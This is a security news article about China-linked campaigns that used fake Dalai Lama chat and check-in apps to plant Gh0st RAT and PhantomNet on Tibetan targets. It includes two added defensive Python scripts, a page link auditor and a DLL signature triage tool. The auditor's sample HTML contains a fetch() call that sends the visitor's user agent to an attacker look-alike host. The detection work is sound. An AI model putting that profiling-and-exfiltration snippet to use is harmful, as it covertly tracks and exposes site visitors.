
China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community


Jul 24, 2025 | Ravie Lakshmanan | Cyber Espionage / Malware


The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama’s 90th birthday on July 6, 2025.

The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz.

“The attackers compromised a legitimate website, redirecting users via a malicious link and ultimately installing either the Gh0st RAT or PhantomNet (aka SManager) backdoor onto victim systems,” security researchers Sudeep Singh and Roy Tay said in a Wednesday report.

This is not the first time Chinese threat actors have resorted to watering hole attacks (aka strategic web compromises), a technique where adversaries break into websites frequently visited by a specific group to infect their devices with malware.


Over the past two years, hacking groups like EvilBamboo, Evasive Panda, and TAG-112 have all resorted to the approach to target the Tibetan diaspora with the ultimate goal of gathering sensitive information.

Operation GhostChat

The latest set of attacks observed by Zscaler involves the compromise of a web page to replace the link pointing to “tibetfund[.]org/90thbirthday” with a fraudulent version (“thedalailama90.niccenter[.]net”).

While the original web page is designed to send a message to the Dalai Lama, the replica page offers an option to send an encrypted message to the spiritual leader by downloading from “tbelement.niccenter[.]net” a secure chat application named TElement, which claims to be a Tibetan version of Element.

Hosted on the website is a backdoored version of the open-source encrypted chat software containing a malicious DLL that is sideloaded to launch Gh0st RAT, a remote access trojan widely used by various Chinese hacking groups. The web page also includes JavaScript code designed to collect the visitor’s IP address and user-agent information, and exfiltrate the details to the threat actor via an HTTP POST request.
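The two tampering signs described above, a swapped link that now points at a look-alike host and an inline script that profiles the visitor and posts the details elsewhere, are exactly what a site owner can audit for on their own pages. The following is an added example written for this page, not code from the article or from Zscaler: it parses rendered HTML with the standard library, checks every anchor, script, iframe and form target against an allow-list of expected hosts, and flags inline scripts that read visitor details and reference an outside URL. The allow-list, the brand tokens and the sample page are constructed for the demonstration.

```python
"""Audit a page's outbound links and inline scripts against a host allow-list.

Added example (not from the article or Zscaler). Run over your own rendered
HTML to catch a link swapped for a look-alike host and inline JavaScript that
reads visitor details and sends them to an outside host. Allow-list, brand
tokens and the sample HTML below are constructed for the demonstration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately links to or loads scripts from (constructed).
ALLOWED_HOSTS = {"tibetfund.org", "www.tibetfund.org"}
# Brand strings whose appearance in an unknown host marks it as a look-alike (constructed).
BRAND_TOKENS = ("dalailama", "tibet")
# Script features typical of visitor profiling, and any quoted absolute URL.
PROFILING_RE = re.compile(r"navigator\.userAgent|document\.cookie|screen\.(?:width|height)")
URL_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]""")


class _Collector(HTMLParser):
    """Gather (tag, url) pairs and the text of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.links, self.inline_scripts = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(("a", a["href"]))
        elif tag == "script" and a.get("src"):
            self.links.append(("script", a["src"]))
        elif tag == "script":
            self._in_script, self._buf = True, []
        elif tag in ("iframe", "form") and (a.get("src") or a.get("action")):
            self.links.append((tag, a.get("src") or a.get("action")))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def _host(url):
    h = urlparse(url).hostname
    return h.lower() if h else None


def audit_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of findings; an empty list means nothing off-allow-list was found."""
    p = _Collector()
    p.feed(html)
    findings = []
    for tag, url in p.links:
        host = _host(url)
        if host is None or host in allowed_hosts:   # relative link or expected host
            continue
        kind = "lookalike-host" if any(t in host for t in BRAND_TOKENS) else "external-host"
        findings.append({"kind": kind, "tag": tag, "url": url})
    for script in p.inline_scripts:
        profiles = bool(PROFILING_RE.search(script))
        for url in URL_RE.findall(script):
            host = _host(url)
            if host and host not in allowed_hosts:
                kind = "profiling-and-external-request" if profiles else "external-request"
                findings.append({"kind": kind, "tag": "script", "url": url})
    return findings


# Constructed page resembling the tampered one: a swapped link plus a profiling script.
SAMPLE_HTML = """<html><body>
<a href="https://tibetfund.org/90thbirthday">Send a birthday message</a>
<a href="https://thedalailama90.niccenter.net/">Send an encrypted message</a>
<a href="/about">About</a>
<script src="https://www.tibetfund.org/js/site.js"></script>
<script>
  var info = {ua: navigator.userAgent};
  fetch("https://thedalailama90.niccenter.net/collect", {method: "POST", body: JSON.stringify(info)});
</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML):
        print(f["kind"], f["tag"], f["url"])
```

The check is deliberately host-based rather than signature-based: the attacker's domain will change, but a link on your own page that leaves your allow-list, especially one carrying your own brand string, is a stable signal. Relative links are skipped because they stay on the origin being audited.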

Gh0st RAT is a fully-featured malware that supports file manipulation, screen capture, clipboard content extraction, webcam video recording, keylogging, audio recording and playback, process manipulation, and remote shell.

Operation PhantomPrayers

The second campaign, Operation PhantomPrayers, has been found to leverage another domain, “hhthedalailama90.niccenter[.]net,” to distribute a phony “90th Birthday Global Check-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, displays an interactive map and urges victims to “send your blessings” for the Dalai Lama by tapping their location on the map.


However, the malicious functionality is stealthily triggered in the background, using DLL side-loading techniques to launch PhantomNet, a backdoor that establishes contact with a command-and-control (C2) server over TCP to receive additional plugin DLLs for execution on the compromised machine.
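Both campaigns rely on DLL side-loading: a trusted executable loads a same-named DLL from its own directory before it looks in system locations, so a trojanized package only needs to ship one rogue DLL beside a legitimate EXE. One cheap triage step on a downloaded package is therefore to list every DLL sitting next to each EXE and check whether it carries an embedded Authenticode signature at all. The following is an added example written for this page, not code from the article or from Zscaler: it reads only the PE headers with the standard library and reports DLLs whose certificate-table entry is empty. The file names and the header-only PE images it builds for the demonstration are constructed; a missing entry is a signal to verify the DLL's origin, not proof of tampering, and a present entry still has to be validated with platform tooling such as Get-AuthenticodeSignature.

```python
"""Triage DLLs that sit beside an executable for a missing Authenticode entry.

Added example (not from the article or Zscaler). DLL side-loading works
because a trusted, signed EXE loads a same-named DLL from its own directory
first, so: which DLLs next to each EXE carry no embedded signature at all?
Only the PE headers are read (standard library only). A missing entry is a
triage signal, not proof of tampering. File names below are constructed.
"""
import os
import struct
import tempfile

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data-directory index of the certificate table


def has_authenticode_entry(data: bytes) -> bool:
    """True if the PE's certificate-table data directory is non-empty."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]   # SizeOfOptionalHeader
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directories at +96
        nrva_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:      # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        nrva_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if struct.unpack_from("<I", data, nrva_off)[0] <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return False
    entry = dirs_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    if entry + 8 > opt + size_opt:
        return False
    va, size = struct.unpack_from("<II", data, entry)
    return va != 0 and size != 0


def audit_directory(path: str):
    """Report every DLL in `path`, the EXEs it sits beside, and its signature status."""
    names = sorted(os.listdir(path))
    exes = [n for n in names if n.lower().endswith(".exe")]
    report = []
    for dll in (n for n in names if n.lower().endswith(".dll")):
        with open(os.path.join(path, dll), "rb") as fh:
            data = fh.read()
        try:
            signed = has_authenticode_entry(data)
            note = "signature entry present" if signed else "no Authenticode entry: verify origin"
        except ValueError as exc:
            signed, note = False, "unparseable PE: %s" % exc
        report.append({"dll": dll, "beside": exes, "has_signature_entry": signed, "note": note})
    return report


def make_synthetic_pe(signed: bool, pe32plus: bool = True) -> bytes:
    """Header-only PE image for the demo (constructed; not loadable)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    dirs_off = 112 if pe32plus else 96
    opt = bytearray(dirs_off + 16 * 8)                 # 16 data directories
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<I", opt, dirs_off - 4, 16)     # NumberOfRvaAndSizes
    if signed:
        struct.pack_into("<II", opt, dirs_off + 4 * 8, 0x1000, 0x800)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, len(opt), 0x2002)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def demo():
    """Put one signed and one unsigned synthetic DLL beside a synthetic EXE and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, signed in (("TElement.exe", True), ("signed_helper.dll", True), ("unsigned_helper.dll", False)):
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(make_synthetic_pe(signed))
        return audit_directory(tmp)


if __name__ == "__main__":
    for row in demo():
        print(row["dll"], "beside", row["beside"], "->", row["note"])
```

Point `audit_directory` at an extracted download and review the rows flagged "verify origin": a DLL with no signature entry sitting beside a signed installer is the shape of both the TElement and DalaiLamaCheckin.exe packages described above, and is worth comparing against the vendor's official distribution before the EXE is ever launched.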

“PhantomNet can be set to operate only during specific hours or days, but this capability is not enabled in the current sample,” the researchers said. “PhantomNet used modular plugin DLLs, AES-encrypted C2 traffic, and configurable timed operations, to stealthily manage compromised systems.”
